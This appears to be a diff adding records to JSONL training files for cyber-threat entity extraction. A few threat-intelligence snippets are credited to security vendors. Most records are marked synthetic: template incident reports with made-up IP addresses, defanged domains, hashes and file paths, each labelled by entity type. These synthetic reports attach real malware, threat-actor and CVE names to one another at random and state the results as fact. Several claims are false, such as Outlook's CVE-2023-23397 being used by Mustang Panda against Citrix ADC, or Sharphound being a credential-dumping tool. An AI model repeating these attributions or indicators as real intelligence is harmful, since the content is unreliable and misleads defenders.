+ {"text": "Mandiant investigated a supply chain compromise attributed to UNC4736, a North Korean threat actor. The attackers trojanized the 3CX Desktop App installer, embedding the TAXHAUL malware loader and COLDCAT backdoor. The compromised application was signed with a valid 3CX certificate. Downstream payload was fetched from the domain raw.githubusercontent.com masquerading as legitimate GitHub content delivery.", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "THREAT_ACTOR: UNC4736": [[62, 69]], "SYSTEM: 3CX Desktop App": [[129, 144]], "MALWARE: TAXHAUL": [[170, 177]], "MALWARE: COLDCAT": [[197, 204]], "DOMAIN: raw.githubusercontent.com": [[331, 356]], "SYSTEM: GitHub": [[384, 390]]}, "info": {"id": "mandiant_00040", "source": "vendor_blogs"}}
65
+ {"text": "Trend Micro identified a new campaign by the Earth Lusca threat group targeting government entities in Asia using the SprySOCKS Linux backdoor. Initial access was achieved through exploitation of CVE-2024-36401 in GeoServer. The malware communicates with command-and-control servers using a custom protocol over TLS, with connections observed to 45.32.101.191 on port 8443.", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "THREAT_ACTOR: Earth Lusca": [[45, 56]], "MALWARE: SprySOCKS": [[118, 127]], "SYSTEM: Linux": [[128, 133]], "CVE_ID: CVE-2024-36401": [[196, 210]], "SYSTEM: GeoServer": [[214, 223]], "IP_ADDRESS: 45.32.101.191": [[346, 359]]}, "info": {"id": "trendmicro_00003", "source": "vendor_blogs"}}
66
+ {"text": "Recorded Future observed Turla, the Russian cyber espionage group also tracked as VENOMOUS BEAR, using compromised Starlink terminals as command-and-control relay points in Ukraine. The group deployed an updated version of the Snake implant that uses named pipes for inter-process communication and encrypts all traffic with ChaCha20. Network indicators included the domain cdn-analytics.cloud-delivery.net.", "spans": {"ORGANIZATION: Recorded Future": [[0, 15]], "THREAT_ACTOR: Turla": [[25, 30]], "THREAT_ACTOR: VENOMOUS BEAR": [[82, 95]], "SYSTEM: Starlink": [[115, 123]], "MALWARE: Snake": [[227, 232]], "DOMAIN: cdn-analytics.cloud-delivery.net": [[374, 406]]}, "info": {"id": "recordedfuture_00002", "source": "vendor_blogs"}}
67
+ {"text": "Google Threat Analysis Group disrupted a campaign by COLDRIVER, a Russian threat actor also known as Star Blizzard, that targeted NGOs and former intelligence officials with credential phishing. The group used Proton Mail accounts to deliver PDF lures containing encrypted content, directing victims to a phishing domain mimicking Proton Drive at proton-docs.services to capture credentials.", "spans": {"ORGANIZATION: Google Threat Analysis Group": [[0, 28]], "THREAT_ACTOR: COLDRIVER": [[53, 62]], "THREAT_ACTOR: Star Blizzard": [[101, 114]], "SYSTEM: Proton Mail": [[210, 221]], "DOMAIN: proton-docs.services": [[347, 367]]}, "info": {"id": "mandiant_00041", "source": "vendor_blogs"}}
data/processed/backup/llm_generated_synthetic.jsonl ADDED
@@ -0,0 +1,100 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {"text": "Analysis of SmokeLoader sample (SHA256: 84325c9da867db65abdc37f0987c2ff1194540edbac2a154e5f5e0e2469055f4) revealed command-and-control communication with 51.7.190.71 over port 443. A secondary C2 channel was observed connecting to data-backup[.]site which resolved to 142.58.36.189. The malware binary was written to C:\\Windows\\Temp\\procdump64.exe and established persistence via a scheduled task.", "spans": {"MALWARE: SmokeLoader": [[12, 23]], "HASH: 84325c9da867db65abdc37f0987c2ff1194540edbac2a154e5f5e0e2469055f4": [[40, 104]], "IP_ADDRESS: 51.7.190.71": [[154, 165]], "DOMAIN: data-backup[.]site": [[231, 249]], "IP_ADDRESS: 142.58.36.189": [[268, 281]], "FILEPATH: C:\\Windows\\Temp\\procdump64.exe": [[317, 347]]}, "info": {"id": "synth_00001", "source": "synthetic_ioc"}}
2
+ {"text": "Incident Report: LockBit Gang compromised the network via initial access from 195.9.8.24. The threat actor deployed Sharphound and exfiltrated data to cdn-delivery[.]xyz. Lateral movement was observed to 109.60.130.155. A dropper with MD5 hash 567d4b6629d474d868a8cf1e0f78ef7c was found at C:\\Users\\admin\\Downloads\\invoice.exe. The exfiltration endpoint collect-log[.]tech was registered 48 hours before the attack.", "spans": {"THREAT_ACTOR: LockBit Gang": [[17, 29]], "IP_ADDRESS: 195.9.8.24": [[78, 88]], "TOOL: Sharphound": [[116, 126]], "DOMAIN: cdn-delivery[.]xyz": [[151, 169]], "IP_ADDRESS: 109.60.130.155": [[204, 218]], "HASH: 567d4b6629d474d868a8cf1e0f78ef7c": [[244, 276]], "FILEPATH: C:\\Users\\admin\\Downloads\\invoice.exe": [[290, 326]], "DOMAIN: collect-log[.]tech": [[354, 372]]}, "info": {"id": "synth_00002", "source": "synthetic_ioc"}}
3
+ {"text": "A phishing email was received from verify@identity-check.tech with subject line 'Urgent Account Verification Required'. The email contained a hyperlink to hxxps://backup-data[.]site/login/verify which redirected to a credential harvesting page. Victims who clicked the link also downloaded Ryuk (SHA256: c4474901665a0c0744866ad575c9691d2379c272cd7e554835755deddc148c1b) which was saved to C:\\ProgramData\\VMware\\update_service.dll.", "spans": {"EMAIL: verify@identity-check.tech": [[35, 61]], "URL: hxxps://backup-data[.]site/login/verify": [[155, 194]], "MALWARE: Ryuk": [[290, 294]], "HASH: c4474901665a0c0744866ad575c9691d2379c272cd7e554835755deddc148c1b": [[304, 368]], "FILEPATH: C:\\ProgramData\\VMware\\update_service.dll": [[389, 429]]}, "info": {"id": "synth_00003", "source": "synthetic_ioc"}}
4
+ {"text": "IOC Summary for Cobalt Strike campaign:\n- 151.208.223.2\n- 84.179.109.88\n- 151.40.56.246\n- rat-control[.]info\n- fast-cdn[.]xyz\n- SHA256: 925c5faf93a600754ce395b64ef13196e5e670d8b231e84af46c592f03efd090\n- MD5: d320dd00f5ddfb60c0ded9784da44284", "spans": {"MALWARE: Cobalt Strike": [[16, 29]], "IP_ADDRESS: 151.208.223.2": [[42, 55]], "IP_ADDRESS: 84.179.109.88": [[58, 71]], "IP_ADDRESS: 151.40.56.246": [[74, 87]], "DOMAIN: rat-control[.]info": [[90, 108]], "DOMAIN: fast-cdn[.]xyz": [[111, 125]], "HASH: 925c5faf93a600754ce395b64ef13196e5e670d8b231e84af46c592f03efd090": [[136, 200]], "HASH: d320dd00f5ddfb60c0ded9784da44284": [[208, 240]]}, "info": {"id": "synth_00004", "source": "synthetic_ioc"}}
5
+ {"text": "Exploitation of CVE-2023-23397 was attributed to Mustang Panda targeting Citrix ADC instances. The exploit payload was served from 37.92.217.89 and communicated with exchange-key[.]link for command-and-control. Post-exploitation, a webshell (SHA256: e01da2e9f598cd128816088ba37a1dd19ca473fd7b9387aaf7aa62864062d036) was deployed to C:\\Users\\Public\\Documents\\payload.dll.", "spans": {"CVE_ID: CVE-2023-23397": [[16, 30]], "THREAT_ACTOR: Mustang Panda": [[49, 62]], "SYSTEM: Citrix ADC": [[73, 83]], "IP_ADDRESS: 37.92.217.89": [[131, 143]], "DOMAIN: exchange-key[.]link": [[166, 185]], "HASH: e01da2e9f598cd128816088ba37a1dd19ca473fd7b9387aaf7aa62864062d036": [[250, 314]], "FILEPATH: C:\\Users\\Public\\Documents\\payload.dll": [[332, 369]]}, "info": {"id": "synth_00005", "source": "synthetic_ioc"}}
6
+ {"text": "Forensic examination of the compromised host identified FormBook artifacts. The primary payload was located at C:\\ProgramData\\VMware\\update_service.dll with SHA256 hash 7aeb949379c93fb6eefd7dd8c11d4c718ba7e9390fa52a98602b131dc2a8db46. A secondary implant was found at /dev/shm/.payload (MD5: a1bd9b43f231677400faa187388aa018). Network logs showed outbound connections to 62.250.237.97 and DNS queries to mail-relay[.]icu.", "spans": {"MALWARE: FormBook": [[56, 64]], "FILEPATH: C:\\ProgramData\\VMware\\update_service.dll": [[111, 151]], "HASH: 7aeb949379c93fb6eefd7dd8c11d4c718ba7e9390fa52a98602b131dc2a8db46": [[169, 233]], "FILEPATH: /dev/shm/.payload": [[268, 285]], "HASH: a1bd9b43f231677400faa187388aa018": [[292, 324]], "IP_ADDRESS: 62.250.237.97": [[371, 384]], "DOMAIN: mail-relay[.]icu": [[404, 420]]}, "info": {"id": "synth_00006", "source": "synthetic_ioc"}}
7
+ {"text": "Threat Intelligence Brief (ESET): MuddyWater has been observed deploying Gh0st RAT in a new campaign targeting financial institutions. Initial access is gained through spear-phishing emails from ceo@urgent-transfer.online. Infrastructure includes 171.148.50.181, 212.12.170.59, and botnet-cmd[.]biz. SHA1 indicator: 1326314af0c9be1c97a1801520ec1769761bd7d5.", "spans": {"ORGANIZATION: ESET": [[27, 31]], "THREAT_ACTOR: MuddyWater": [[34, 44]], "MALWARE: Gh0st RAT": [[73, 82]], "EMAIL: ceo@urgent-transfer.online": [[195, 221]], "IP_ADDRESS: 171.148.50.181": [[247, 261]], "IP_ADDRESS: 212.12.170.59": [[263, 276]], "DOMAIN: botnet-cmd[.]biz": [[282, 298]], "HASH: 1326314af0c9be1c97a1801520ec1769761bd7d5": [[316, 356]]}, "info": {"id": "synth_00007", "source": "synthetic_ioc"}}
8
+ {"text": "ALERT: TrickBot detected on Confluence Server endpoint. Process C:\\ProgramData\\VMware\\update_service.dll (MD5: 269c2b631512bc8963638ac8867798ad) initiated outbound connection to 134.222.26.98 resolving token-auth[.]space. Immediate containment recommended.", "spans": {"MALWARE: TrickBot": [[7, 15]], "SYSTEM: Confluence Server": [[28, 45]], "FILEPATH: C:\\ProgramData\\VMware\\update_service.dll": [[64, 104]], "HASH: 269c2b631512bc8963638ac8867798ad": [[111, 143]], "IP_ADDRESS: 134.222.26.98": [[178, 191]], "DOMAIN: token-auth[.]space": [[202, 220]]}, "info": {"id": "synth_00008", "source": "synthetic_ioc"}}
9
+ {"text": "The Royal Ransomware loader contacts three staging URLs: hxxps://dns-resolve[.]cc/download/payload.exe, hxxp://api-gateway[.]club/gate.php, and hxxps://login-verify[.]top/api/beacon. The final payload (SHA256: 9fc140d1410e9943b97811dbf6abc763574bde3534a22a4dd70c900b73fd8021) is downloaded and executed. Fallback C2 is at 104.172.69.180.", "spans": {"MALWARE: Royal Ransomware": [[4, 20]], "URL: hxxps://dns-resolve[.]cc/download/payload.exe": [[57, 102]], "URL: hxxp://api-gateway[.]club/gate.php": [[104, 138]], "URL: hxxps://login-verify[.]top/api/beacon": [[144, 181]], "HASH: 9fc140d1410e9943b97811dbf6abc763574bde3534a22a4dd70c900b73fd8021": [[210, 274]], "IP_ADDRESS: 104.172.69.180": [[322, 336]]}, "info": {"id": "synth_00009", "source": "synthetic_ioc"}}
10
+ {"text": "The phishing campaign used sender addresses admin@fake-portal.org and access@vpn-connect.space. Links in the emails pointed to malware-drop[.]net hosted at 85.137.187.63. The attached document dropped a payload to C:\\Temp\\mimikatz.exe with hash 02c7fa8299a913dc28b9513621319724823c5b5211a5fe69a902c4c080cb5c5e.", "spans": {"EMAIL: admin@fake-portal.org": [[44, 65]], "EMAIL: access@vpn-connect.space": [[70, 94]], "DOMAIN: malware-drop[.]net": [[127, 145]], "IP_ADDRESS: 85.137.187.63": [[156, 169]], "FILEPATH: C:\\Temp\\mimikatz.exe": [[214, 234]], "HASH: 02c7fa8299a913dc28b9513621319724823c5b5211a5fe69a902c4c080cb5c5e": [[245, 309]]}, "info": {"id": "synth_00010", "source": "synthetic_ioc"}}
11
+ {"text": "Multiple AsyncRAT samples identified:\n- SHA256: 20d4346443b1e9cf1ae0a388f969997489c5defccbc9c2c40ea2a98c382ac697\n- SHA256: b77958e427f54145fc2b6d719ba846367b5b496ca30879504b0b5331899ed4d8\n- MD5: 8f277b34e7ed296d4d1f69048f0ab2da\n- MD5: 2caa8607b73a1e1f0b406621489d1f5b\nAll samples beacon to 176.70.254.237 and malware-drop[.]net.", "spans": {"MALWARE: AsyncRAT": [[9, 17]], "HASH: 20d4346443b1e9cf1ae0a388f969997489c5defccbc9c2c40ea2a98c382ac697": [[48, 112]], "HASH: b77958e427f54145fc2b6d719ba846367b5b496ca30879504b0b5331899ed4d8": [[123, 187]], "HASH: 8f277b34e7ed296d4d1f69048f0ab2da": [[195, 227]], "HASH: 2caa8607b73a1e1f0b406621489d1f5b": [[235, 267]], "IP_ADDRESS: 176.70.254.237": [[290, 304]], "DOMAIN: malware-drop[.]net": [[309, 327]]}, "info": {"id": "synth_00011", "source": "synthetic_ioc"}}
12
+ {"text": "Gamaredon used Sharphound for credential dumping and ngrok for lateral movement. Credentials were exfiltrated to 128.176.84.216. The attacker pivoted to 203.59.211.9 and dropped C:\\Windows\\System32\\wbem\\scrcons.exe (MD5: f6be9aa669ca4daec49d487c70b29f19). C2 traffic was routed through smtp-relay[.]icu.", "spans": {"THREAT_ACTOR: Gamaredon": [[0, 9]], "TOOL: Sharphound": [[15, 25]], "TOOL: ngrok": [[53, 58]], "IP_ADDRESS: 128.176.84.216": [[113, 127]], "IP_ADDRESS: 203.59.211.9": [[153, 165]], "FILEPATH: C:\\Windows\\System32\\wbem\\scrcons.exe": [[178, 214]], "HASH: f6be9aa669ca4daec49d487c70b29f19": [[221, 253]], "DOMAIN: smtp-relay[.]icu": [[286, 302]]}, "info": {"id": "synth_00012", "source": "synthetic_ioc"}}
13
+ {"text": "The Conti attack began with exploitation of CVE-2023-46805. The ransomware binary (SHA256: 34bc3c67b200df0763023cbfab91e46021b3d990229b85d2d94e0f01e7d5bd12) was deployed to C:\\Windows\\System32\\wbem\\scrcons.exe. Ransom negotiation portal was hosted at ransom-pay[.]icu (109.234.242.146). Contact email for payment: billing@invoice-payment.work.", "spans": {"MALWARE: Conti": [[4, 9]], "CVE_ID: CVE-2023-46805": [[44, 58]], "HASH: 34bc3c67b200df0763023cbfab91e46021b3d990229b85d2d94e0f01e7d5bd12": [[91, 155]], "FILEPATH: C:\\Windows\\System32\\wbem\\scrcons.exe": [[173, 209]], "DOMAIN: ransom-pay[.]icu": [[251, 267]], "IP_ADDRESS: 109.234.242.146": [[269, 284]], "EMAIL: billing@invoice-payment.work": [[314, 342]]}, "info": {"id": "synth_00013", "source": "synthetic_ioc"}}
14
+ {"text": "DNS analysis for Agent Tesla infrastructure: smtp-relay[.]icu resolved to 80.68.36.64, phish-kit[.]xyz resolved to 213.68.192.150, and share-files[.]biz was used as a DNS-over-HTTPS tunnel. The implant hash is a780ced71594af256b57e8911b0ab73a.", "spans": {"MALWARE: Agent Tesla": [[17, 28]], "DOMAIN: smtp-relay[.]icu": [[45, 61]], "IP_ADDRESS: 80.68.36.64": [[74, 85]], "DOMAIN: phish-kit[.]xyz": [[87, 102]], "IP_ADDRESS: 213.68.192.150": [[115, 129]], "DOMAIN: share-files[.]biz": [[135, 152]], "HASH: a780ced71594af256b57e8911b0ab73a": [[210, 242]]}, "info": {"id": "synth_00014", "source": "synthetic_ioc"}}
15
+ {"text": "Sandbox Report: BlackBasta\nSHA256: 33e15fdf06d0ef3cba71c6252123b73fe5535721122d94a52fe5c9721ade5f71\nMD5: 0821454b0dda7148ca2cf3019d57e250\nFile created: C:\\Windows\\System32\\config\\SAM\nFile modified: C:\\Users\\Public\\Documents\\payload.dll\nNetwork connection: 181.93.57.36\nDNS query: gate-proxy[.]ru\nHTTP request: hxxps://rat-control[.]info/stage2", "spans": {"MALWARE: BlackBasta": [[16, 26]], "HASH: 33e15fdf06d0ef3cba71c6252123b73fe5535721122d94a52fe5c9721ade5f71": [[35, 99]], "HASH: 0821454b0dda7148ca2cf3019d57e250": [[105, 137]], "FILEPATH: C:\\Windows\\System32\\config\\SAM": [[152, 182]], "FILEPATH: C:\\Users\\Public\\Documents\\payload.dll": [[198, 235]], "IP_ADDRESS: 181.93.57.36": [[256, 268]], "DOMAIN: gate-proxy[.]ru": [[280, 295]], "URL: hxxps://rat-control[.]info/stage2": [[310, 343]]}, "info": {"id": "synth_00015", "source": "synthetic_ioc"}}
16
+ {"text": "Analysis of QakBot sample (SHA256: b4d4850f626be905cb2e218c240d66abeba9ef0a2579c4555f09822e24402823) revealed command-and-control communication with 51.40.161.41 over port 4443. A secondary C2 channel was observed connecting to sync-cloud[.]work which resolved to 195.153.17.99. The malware binary was written to C:\\Windows\\INF\\setupapi.dev.dll and established persistence via a scheduled task.", "spans": {"MALWARE: QakBot": [[12, 18]], "HASH: b4d4850f626be905cb2e218c240d66abeba9ef0a2579c4555f09822e24402823": [[35, 99]], "IP_ADDRESS: 51.40.161.41": [[149, 161]], "DOMAIN: sync-cloud[.]work": [[228, 245]], "IP_ADDRESS: 195.153.17.99": [[264, 277]], "FILEPATH: C:\\Windows\\INF\\setupapi.dev.dll": [[313, 344]]}, "info": {"id": "synth_00016", "source": "synthetic_ioc"}}
17
+ {"text": "Incident Report: UNC2452 compromised the network via initial access from 144.249.142.221. The threat actor deployed ADFind and exfiltrated data to exfil-data[.]club. Lateral movement was observed to 91.175.185.30. A dropper with MD5 hash 0902d0da28bf53180fde0471fa1cdc23 was found at C:\\Windows\\Temp\\procdump64.exe. The exfiltration endpoint monitor-net[.]org was registered 48 hours before the attack.", "spans": {"THREAT_ACTOR: UNC2452": [[17, 24]], "IP_ADDRESS: 144.249.142.221": [[73, 88]], "TOOL: ADFind": [[116, 122]], "DOMAIN: exfil-data[.]club": [[147, 164]], "IP_ADDRESS: 91.175.185.30": [[199, 212]], "HASH: 0902d0da28bf53180fde0471fa1cdc23": [[238, 270]], "FILEPATH: C:\\Windows\\Temp\\procdump64.exe": [[284, 314]], "DOMAIN: monitor-net[.]org": [[342, 359]]}, "info": {"id": "synth_00017", "source": "synthetic_ioc"}}
18
+ {"text": "A phishing email was received from finance@wire-transfer.info with subject line 'Urgent Account Verification Required'. The email contained a hyperlink to hxxps://system-patch[.]online/login/verify which redirected to a credential harvesting page. Victims who clicked the link also downloaded REvil (SHA256: f40a476268e27f996d4a04e180b6107f501aa9aca27234ae01ffc48c87eb00b8) which was saved to C:\\Windows\\Temp\\nc.exe.", "spans": {"EMAIL: finance@wire-transfer.info": [[35, 61]], "URL: hxxps://system-patch[.]online/login/verify": [[155, 197]], "MALWARE: REvil": [[293, 298]], "HASH: f40a476268e27f996d4a04e180b6107f501aa9aca27234ae01ffc48c87eb00b8": [[308, 372]], "FILEPATH: C:\\Windows\\Temp\\nc.exe": [[393, 415]]}, "info": {"id": "synth_00018", "source": "synthetic_ioc"}}
19
+ {"text": "IOC Summary for Gh0st RAT campaign:\n- 84.117.1.245\n- 146.249.129.196\n- 88.130.234.28\n- malware-drop[.]net\n- code-deploy[.]store\n- SHA256: e812600207967f5d5e12a6203c2c5fabad5e5a0f4e54b405b82af761883b733c\n- MD5: 67c1c069b26d1aac66d67f1922686d64", "spans": {"MALWARE: Gh0st RAT": [[16, 25]], "IP_ADDRESS: 84.117.1.245": [[38, 50]], "IP_ADDRESS: 146.249.129.196": [[53, 68]], "IP_ADDRESS: 88.130.234.28": [[71, 84]], "DOMAIN: malware-drop[.]net": [[87, 105]], "DOMAIN: code-deploy[.]store": [[108, 127]], "HASH: e812600207967f5d5e12a6203c2c5fabad5e5a0f4e54b405b82af761883b733c": [[138, 202]], "HASH: 67c1c069b26d1aac66d67f1922686d64": [[210, 242]]}, "info": {"id": "synth_00019", "source": "synthetic_ioc"}}
20
+ {"text": "Exploitation of CVE-2022-22965 was attributed to ALPHV targeting Windows Server 2019 instances. The exploit payload was served from 95.40.96.196 and communicated with dns-resolve[.]cc for command-and-control. Post-exploitation, a webshell (SHA256: 75618d15fc854fd1ded97e184898048a0d6e2d92f8bdcfe4129815b13a153070) was deployed to /tmp/.hidden/beacon.", "spans": {"CVE_ID: CVE-2022-22965": [[16, 30]], "THREAT_ACTOR: ALPHV": [[49, 54]], "SYSTEM: Windows Server 2019": [[65, 84]], "IP_ADDRESS: 95.40.96.196": [[132, 144]], "DOMAIN: dns-resolve[.]cc": [[167, 183]], "HASH: 75618d15fc854fd1ded97e184898048a0d6e2d92f8bdcfe4129815b13a153070": [[248, 312]], "FILEPATH: /tmp/.hidden/beacon": [[330, 349]]}, "info": {"id": "synth_00020", "source": "synthetic_ioc"}}
21
+ {"text": "Forensic examination of the compromised host identified Ryuk artifacts. The primary payload was located at C:\\Windows\\System32\\config\\SAM with SHA256 hash fad5464ca78bf7ea789d0b75d495dd68e0be607fddb3fef461889a996900649b. A secondary implant was found at /tmp/.hidden/beacon (MD5: f2405ea9ed106751b3fab66afe53efbc). Network logs showed outbound connections to 51.238.93.225 and DNS queries to code-deploy[.]store.", "spans": {"MALWARE: Ryuk": [[56, 60]], "FILEPATH: C:\\Windows\\System32\\config\\SAM": [[107, 137]], "HASH: fad5464ca78bf7ea789d0b75d495dd68e0be607fddb3fef461889a996900649b": [[155, 219]], "FILEPATH: /tmp/.hidden/beacon": [[254, 273]], "HASH: f2405ea9ed106751b3fab66afe53efbc": [[280, 312]], "IP_ADDRESS: 51.238.93.225": [[359, 372]], "DOMAIN: code-deploy[.]store": [[392, 411]]}, "info": {"id": "synth_00021", "source": "synthetic_ioc"}}
22
+ {"text": "Threat Intelligence Brief (Check Point): APT28 has been observed deploying Ryuk in a new campaign targeting financial institutions. Initial access is gained through spear-phishing emails from noreply@payment-confirm.top. Infrastructure includes 23.22.188.125, 212.251.195.137, and botnet-cmd[.]biz. SHA1 indicator: 02e8b81a65656c6f6f4d56959539112f29d1dc06.", "spans": {"ORGANIZATION: Check Point": [[27, 38]], "THREAT_ACTOR: APT28": [[41, 46]], "MALWARE: Ryuk": [[75, 79]], "EMAIL: noreply@payment-confirm.top": [[192, 219]], "IP_ADDRESS: 23.22.188.125": [[245, 258]], "IP_ADDRESS: 212.251.195.137": [[260, 275]], "DOMAIN: botnet-cmd[.]biz": [[281, 297]], "HASH: 02e8b81a65656c6f6f4d56959539112f29d1dc06": [[315, 355]]}, "info": {"id": "synth_00022", "source": "synthetic_ioc"}}
23
+ {"text": "ALERT: Mimikatz detected on Nginx endpoint. Process C:\\Users\\Public\\Libraries\\shell.ps1 (MD5: 78a8258631abcaf49dde4311227bd06b) initiated outbound connection to 204.243.141.43 resolving cert-verify[.]dev. Immediate containment recommended.", "spans": {"MALWARE: Mimikatz": [[7, 15]], "SYSTEM: Nginx": [[28, 33]], "FILEPATH: C:\\Users\\Public\\Libraries\\shell.ps1": [[52, 87]], "HASH: 78a8258631abcaf49dde4311227bd06b": [[94, 126]], "IP_ADDRESS: 204.243.141.43": [[161, 175]], "DOMAIN: cert-verify[.]dev": [[186, 203]]}, "info": {"id": "synth_00023", "source": "synthetic_ioc"}}
24
+ {"text": "The Vidar loader contacts three staging URLs: hxxps://web-cache[.]io/download/payload.exe, hxxp://monitor-net[.]org/gate.php, and hxxps://rat-control[.]info/api/beacon. The final payload (SHA256: 98e5bb96c027022603778697be8134a244ad4758b0015a5eb10851f70ee9ca2a) is downloaded and executed. Fallback C2 is at 95.183.80.103.", "spans": {"MALWARE: Vidar": [[4, 9]], "URL: hxxps://web-cache[.]io/download/payload.exe": [[46, 89]], "URL: hxxp://monitor-net[.]org/gate.php": [[91, 124]], "URL: hxxps://rat-control[.]info/api/beacon": [[130, 167]], "HASH: 98e5bb96c027022603778697be8134a244ad4758b0015a5eb10851f70ee9ca2a": [[196, 260]], "IP_ADDRESS: 95.183.80.103": [[308, 321]]}, "info": {"id": "synth_00024", "source": "synthetic_ioc"}}
25
+ {"text": "The phishing campaign used sender addresses helpdesk@reset-password.biz and cloud@storage-share.ru. Links in the emails pointed to cache-web[.]io hosted at 200.31.64.58. The attached document dropped a payload to C:\\Users\\Public\\Documents\\payload.dll with hash d272224b14b9857094138e9752bc37ba844a6d140b3abf18dce7304c4fc06dd1.", "spans": {"EMAIL: helpdesk@reset-password.biz": [[44, 71]], "EMAIL: cloud@storage-share.ru": [[76, 98]], "DOMAIN: cache-web[.]io": [[131, 145]], "IP_ADDRESS: 200.31.64.58": [[156, 168]], "FILEPATH: C:\\Users\\Public\\Documents\\payload.dll": [[213, 250]], "HASH: d272224b14b9857094138e9752bc37ba844a6d140b3abf18dce7304c4fc06dd1": [[261, 325]]}, "info": {"id": "synth_00025", "source": "synthetic_ioc"}}
26
+ {"text": "Multiple LockBit samples identified:\n- SHA256: e3ec5897e095faeaf6a20a1eceb0dddc324bef053b94b44f51ec1ba8c5f2af1d\n- SHA256: 906f9a00f9a8961a34093aa0a6709940ec1afccb8ed58247105755213abad8b9\n- MD5: 5449d61503b2077aeb04dbbdaf1ff79d\n- MD5: 6f1b9f0d68e4bc85af0e740a1d2013b2\nAll samples beacon to 103.151.142.59 and auth-token[.]space.", "spans": {"MALWARE: LockBit": [[9, 16]], "HASH: e3ec5897e095faeaf6a20a1eceb0dddc324bef053b94b44f51ec1ba8c5f2af1d": [[47, 111]], "HASH: 906f9a00f9a8961a34093aa0a6709940ec1afccb8ed58247105755213abad8b9": [[122, 186]], "HASH: 5449d61503b2077aeb04dbbdaf1ff79d": [[194, 226]], "HASH: 6f1b9f0d68e4bc85af0e740a1d2013b2": [[234, 266]], "IP_ADDRESS: 103.151.142.59": [[289, 303]], "DOMAIN: auth-token[.]space": [[308, 326]]}, "info": {"id": "synth_00026", "source": "synthetic_ioc"}}
27
+ {"text": "UNC2452 used Brute Ratel C4 for credential dumping and Cobalt Strike for lateral movement. Credentials were exfiltrated to 216.182.162.16. The attacker pivoted to 134.18.232.9 and dropped C:\\Windows\\System32\\wbem\\scrcons.exe (MD5: c551800b48a492d547bb8c90938dd5b0). C2 traffic was routed through cloud-sync[.]work.", "spans": {"THREAT_ACTOR: UNC2452": [[0, 7]], "TOOL: Brute Ratel C4": [[13, 27]], "TOOL: Cobalt Strike": [[55, 68]], "IP_ADDRESS: 216.182.162.16": [[123, 137]], "IP_ADDRESS: 134.18.232.9": [[163, 175]], "FILEPATH: C:\\Windows\\System32\\wbem\\scrcons.exe": [[188, 224]], "HASH: c551800b48a492d547bb8c90938dd5b0": [[231, 263]], "DOMAIN: cloud-sync[.]work": [[296, 313]]}, "info": {"id": "synth_00027", "source": "synthetic_ioc"}}
28
+ {"text": "The LockBit attack began with exploitation of CVE-2023-20198. The ransomware binary (SHA256: c393ca0eb7bc6f728f14083b5758604c5b8faf4892456ae05961359e44cf655e) was deployed to C:\\Windows\\System32\\drivers\\ndis_helper.sys. Ransom negotiation portal was hosted at monitor-net[.]org (151.172.125.55). Contact email for payment: alert@security-warning.dev.", "spans": {"MALWARE: LockBit": [[4, 11]], "CVE_ID: CVE-2023-20198": [[46, 60]], "HASH: c393ca0eb7bc6f728f14083b5758604c5b8faf4892456ae05961359e44cf655e": [[93, 157]], "FILEPATH: C:\\Windows\\System32\\drivers\\ndis_helper.sys": [[175, 218]], "DOMAIN: monitor-net[.]org": [[260, 277]], "IP_ADDRESS: 151.172.125.55": [[279, 293]], "EMAIL: alert@security-warning.dev": [[323, 349]]}, "info": {"id": "synth_00028", "source": "synthetic_ioc"}}
29
+ {"text": "DNS analysis for AsyncRAT infrastructure: resolve-dns[.]cc resolved to 182.49.25.25, log-collect[.]tech resolved to 196.91.109.106, and resolve-dns[.]cc was used as a DNS-over-HTTPS tunnel. The implant hash is 6c79a41072cb700870258a4dcb260cda.", "spans": {"MALWARE: AsyncRAT": [[17, 25]], "DOMAIN: resolve-dns[.]cc": [[42, 58], [136, 152]], "IP_ADDRESS: 182.49.25.25": [[71, 83]], "DOMAIN: log-collect[.]tech": [[85, 103]], "IP_ADDRESS: 196.91.109.106": [[116, 130]], "HASH: 6c79a41072cb700870258a4dcb260cda": [[210, 242]]}, "info": {"id": "synth_00029", "source": "synthetic_ioc"}}
30
+ {"text": "Sandbox Report: DarkSide\nSHA256: 5315d93087e2a91ae4d43afdf75f2d294f7d24ee0db18f046ba24dcd326a83a3\nMD5: b371e6d5fa38d1c55f9163beacdb7b3b\nFile created: C:\\ProgramData\\Microsoft\\update.bat\nFile modified: C:\\Windows\\Temp\\debug.exe\nNetwork connection: 198.173.168.252\nDNS query: phish-kit[.]xyz\nHTTP request: hxxps://smtp-relay[.]icu/stage2", "spans": {"MALWARE: DarkSide": [[16, 24]], "HASH: 5315d93087e2a91ae4d43afdf75f2d294f7d24ee0db18f046ba24dcd326a83a3": [[33, 97]], "HASH: b371e6d5fa38d1c55f9163beacdb7b3b": [[103, 135]], "FILEPATH: C:\\ProgramData\\Microsoft\\update.bat": [[150, 185]], "FILEPATH: C:\\Windows\\Temp\\debug.exe": [[201, 226]], "IP_ADDRESS: 198.173.168.252": [[247, 262]], "DOMAIN: phish-kit[.]xyz": [[274, 289]], "URL: hxxps://smtp-relay[.]icu/stage2": [[304, 335]]}, "info": {"id": "synth_00030", "source": "synthetic_ioc"}}
31
+ {"text": "Analysis of Bumblebee sample (SHA256: c96536195fde69d6a3f326248e54d229072a3cb321d912be0b7932c0be993caa) revealed command-and-control communication with 168.205.221.28 over port 4443. A secondary C2 channel was observed connecting to portal-auth[.]info which resolved to 142.50.49.138. The malware binary was written to C:\\Windows\\System32\\drivers\\ndis_helper.sys and established persistence via a scheduled task.", "spans": {"MALWARE: Bumblebee": [[12, 21]], "HASH: c96536195fde69d6a3f326248e54d229072a3cb321d912be0b7932c0be993caa": [[38, 102]], "IP_ADDRESS: 168.205.221.28": [[152, 166]], "DOMAIN: portal-auth[.]info": [[233, 251]], "IP_ADDRESS: 142.50.49.138": [[270, 283]], "FILEPATH: C:\\Windows\\System32\\drivers\\ndis_helper.sys": [[319, 362]]}, "info": {"id": "synth_00031", "source": "synthetic_ioc"}}
32
